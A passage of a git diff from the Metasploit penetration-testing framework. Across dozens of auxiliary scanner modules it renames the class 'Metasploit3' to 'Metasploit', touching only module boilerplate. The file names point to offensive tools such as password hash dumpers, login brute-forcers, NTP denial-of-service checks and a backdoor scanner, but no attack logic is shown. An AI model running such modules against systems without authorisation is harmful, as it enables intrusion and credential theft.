Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 44f949da95..295d547e38 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 39a58fb004..19166ad1e1 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 9f0c275fd7..17f45c1975 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index 1dd600d8eb..e743a358b9 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Module::Deprecated deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server') diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index e77aaa2c1e..b454d354cb 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index d52870235d..8f06898feb 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 04900cde94..aeca6b8a79 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 3fbd8b36c1..31b6cf1a9e 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index e8091b4b1b..ac8c4ced34 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 525441c1c4..113b2f6db2 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb index 1f3100ec96..fff3ac4e67 100644 --- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb +++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 28cacb64af..289cd5b899 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 5180dc687f..40078ffa58 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 6c07f9f3b8..c3577dc00c 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mssql' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index 12078e523a..16d2386be1 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 628a8fdb86..6f91229193 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index bcb1234c20..5e2fb28ff9 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index f5b6bdbe5c..7660c7da6f 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index ce7c378756..e0675179c8 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 97658016c6..618777b721 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mysql' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index ede601b57e..cd8aa10f86 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index bde7d5c2b7..c7b7769ca3 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index 5c21a67f68..0170e22244 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index ba12f61143..b6dcd860e7 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 88aef9dc9b..4d2fa5243c 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/nessus' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index e687f70ddf..6c044c8dc3 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb index 412c93108b..cfd0a71019 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index 64b9befe91..78019a0f92 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index fe990c8685..68ad6a9761 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb index 0953d09cec..085517a5fa 100644 --- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb +++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index fd2aee0706..efa9867238 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index ba17c40926..c74f3c019d 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb index 104e73a527..eb07a92d1c 100644 --- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb +++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index c2d7653db8..8795533dfa 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 900c9b7fad..dc2293886e 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 98cb2a0d4c..da1a4cb989 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index f31ee5f258..ec3049f5f1 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index eb4ebbc44a..c8e9a3901d 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 9913e40b1c..d966e403cf 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index 0d0e0d3916..c9ab8d1e37 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index c778ba15ca..171a21853f 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index fbf870fb2d..65401e01c9 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index f72286bd28..85bc01b40a 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index fa717b7ec0..1717b861cd 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e3ba450180..11a895ac50 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index c3a0442d33..2b27b12199 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index b733440c72..12cd2fd5ab 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Nmap diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a61284d5fd..cc6453c83e 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 7b24a42b36..8eea7f3401 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 3b740f7643..902e078b0c 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 3bd78c1437..36bb2e93ed 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index aab795941c..dcad8d2225 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index c07928617e..ff5ce4ad87 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 8fe5687b47..520afffab2 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index d787bf7863..c66b9258f7 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index ab83d9191d..db215a0994 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 693c294945..fcbaa9f2f0 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 98ae8f9257..877edec755 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/pop3' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index ff3d1828c2..8d3c33721f 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index abc7f8ca76..04bcd83b10 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff 